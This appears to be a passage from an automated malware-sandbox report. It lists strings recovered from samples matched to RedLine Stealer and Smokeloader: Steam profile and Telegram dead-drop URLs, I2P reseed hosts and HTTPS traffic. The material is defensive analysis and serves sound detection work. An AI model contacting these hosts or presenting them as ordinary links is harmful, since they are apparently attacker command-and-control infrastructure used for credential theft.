Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://i2p.ghativega.in/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: https://i2p.mooo.com/netDb/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://i2p.novg.net/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: https://netdb.i2p2.no/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed.diva.exchange/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: https://reseed.i2p-projekt.de/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed.i2pgit.org/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed.memcpy.io/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed.onion.im/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed2.i2p.net/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2762253914.00000000024F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
Source: file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/privac
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: file.exe, file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/armad2a
Source: file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://www2.mk16.de/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.6:49714 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2762173907.000000000249D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C84B700
